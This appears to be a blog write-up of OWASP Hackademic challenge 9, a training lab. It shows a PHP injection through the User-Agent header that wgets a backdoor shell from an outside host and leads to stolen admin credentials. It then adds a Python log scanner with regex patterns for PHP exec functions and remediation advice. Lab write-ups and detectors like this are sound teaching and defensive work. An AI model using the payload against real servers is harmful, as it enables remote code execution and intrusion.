Another day, another challenge.
Today’s post will be on the ninth challenge from the OWASP Hackademic Challenge.
Below is the scenario:
A friend of yours has set up a news blog at slagoff.com. However, he is kind of worried regarding the security of the news that gets posted on the blog and has asked you to check how secure it is.
Your objective is to determine whether any vulnerabilities exist that, if exploited, can grant access to the blog’s server.
Hint: A specially-tailored backdoor shell can be found at “http://www.really_nasty_hacker.com/shell.txt”.
Below is the solution:
Clicking the first link, we are presented with the following screen:
Right-clicking and choosing View Page Source, we get the following:
We notice there’s a hidden field named page with the value answer.php. Hmm… let’s see if we can access this page.
Entering that address in the URL bar, it seems we cannot access the file directly.
From the description we know that we need to get the file at http://www.really_nasty_hacker.com/shell.txt onto the server.
We know that the site is running PHP. Let’s see if we can put PHP code in the User-Agent header and have it executed.
Opening Tamper Data after we submit the comment, we’re presented with the following:
Changing the User-Agent to:
<?system("wget http://www.really_nasty_hacker.com/shell.txt");?>
Pressing “OK” we get the following:
Our script was uploaded successfully!
Going to the new site we see the following:
Hmm… We’re presented with a command line similar to challenge 8!
Let’s run ls to see what is on the file system.
We see that there is a file named “sUpErDuPErL33T.txt”.
Let’s see what’s in this file.
We’re presented with login information.
Looking back at the output of the ls command, we see another file, adminpanel.php.
Going to that file we see the following:
An admin portal!
Let’s enter our login information and see what we get:
We passed the challenge!!!
Lessons learned:
Right-click, View Page Source showed a hidden field pointing to answer.php. Trying to access that file directly didn’t help us. Next, by changing the User-Agent header, we were able to get our file onto the file system. Visiting that file, we noticed it allowed us to execute commands. Executing commands, we found the login information and logged in successfully.
Use the knowledge you’ve learned to solve the next challenge. We were first introduced to User-Agents in challenge #5 with the p0wnbrowser product. We know that we can change the User-Agent to reveal content that we would otherwise never have noticed.
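The root cause here is that the blog wrote the raw User-Agent header into a file that PHP later interpreted, so code in the header ran as code. From the defending side, the same header is also what shows up in the web server’s access log, which makes this kind of attempt easy to spot. As an added example (my own code, not part of the challenge or this write-up), the script below parses Apache “combined” format log lines and flags User-Agent values that contain PHP tags or command-execution functions. The log lines are constructed for the example, and the assumption that the blog logs in combined format is mine.

```python
import re
from typing import Dict, List, Optional

# Apache/nginx "combined" log format. Apache escapes embedded quotes in the
# quoted fields as \", so each quoted field is matched as (?:[^"\\]|\\.)*
# rather than the usual [^"]*, which would stop at the first escaped quote.
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<request>(?:[^"\\]|\\.)*)" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<ua>(?:[^"\\]|\\.)*)"$'
)

# Indicators that a User-Agent carries PHP code rather than a browser string.
PHP_OPEN_TAG = re.compile(r'<\?(?:php\b|=)?', re.IGNORECASE)
PHP_CLOSE_TAG = re.compile(r'\?>')
PHP_EXEC_CALL = re.compile(
    r'\b(system|exec|shell_exec|passthru|popen|proc_open|eval)\s*\(',
    re.IGNORECASE,
)

# Constructed sample lines (not real traffic). Line 2 carries the same
# payload shape used in the challenge; line 3 is a tag with no exec call.
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Mar/2012:10:01:02 +0000] "POST /comment.php HTTP/1.1" 200 512 '
    '"http://slagoff.com/" "Mozilla/5.0 (X11; Linux x86_64) Firefox/10.0"',
    '10.0.0.9 - - [12/Mar/2012:10:01:40 +0000] "POST /comment.php HTTP/1.1" 200 512 '
    '"http://slagoff.com/" "<?system(\\"wget http://www.really_nasty_hacker.com/shell.txt\\");?>"',
    '10.0.0.9 - - [12/Mar/2012:10:02:10 +0000] "GET /shell.txt HTTP/1.1" 404 201 '
    '"-" "<?php echo 1; ?>"',
    '10.0.0.7 - - [12/Mar/2012:10:03:00 +0000] "GET /index.php HTTP/1.1" 200 1024 '
    '"-" "curl/7.22.0"',
]


def unescape_log_field(field: str) -> str:
    """Undo the backslash escaping Apache applies to quoted log fields."""
    return re.sub(r'\\(.)', r'\1', field)


def parse_combined(line: str) -> Optional[Dict[str, str]]:
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = COMBINED_RE.match(line.rstrip("\n"))
    if not m:
        return None
    rec = m.groupdict()
    for key in ("request", "referer", "ua"):
        rec[key] = unescape_log_field(rec[key])
    return rec


def php_indicators(ua: str) -> List[str]:
    """List which PHP-code indicators appear in a User-Agent value."""
    found: List[str] = []
    if PHP_OPEN_TAG.search(ua):
        found.append("php_open_tag")
    if PHP_CLOSE_TAG.search(ua):
        found.append("php_close_tag")
    m = PHP_EXEC_CALL.search(ua)
    if m:
        found.append("exec_call:" + m.group(1).lower())
    return found


def severity(indicators: List[str]) -> str:
    """A tag plus an exec call is almost certainly injection; either alone is worth a look."""
    has_tag = "php_open_tag" in indicators
    has_call = any(i.startswith("exec_call:") for i in indicators)
    if has_tag and has_call:
        return "high"
    if has_tag or has_call:
        return "medium"
    return "none"


def scan_log(lines: List[str]) -> List[Dict[str, object]]:
    """Scan log lines and return one hit per line whose User-Agent looks like PHP code."""
    hits: List[Dict[str, object]] = []
    for n, line in enumerate(lines, 1):
        rec = parse_combined(line)
        if rec is None:
            continue  # unparseable line; a real pipeline would count these
        ind = php_indicators(rec["ua"])
        if ind:
            hits.append({
                "line": n,
                "ip": rec["ip"],
                "request": rec["request"],
                "indicators": ind,
                "severity": severity(ind),
            })
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

The detection is a coarse one: a browser string never legitimately contains `<?` or `system(`, so even the medium hits deserve review, though `<?` on its own can occasionally come from scanners rather than a targeted attempt. The actual fix on the application side is to treat every request header as data: never write raw header values into a file that PHP (or any interpreter) will later include, and escape them with something like `htmlspecialchars()` when they are rendered back to a page.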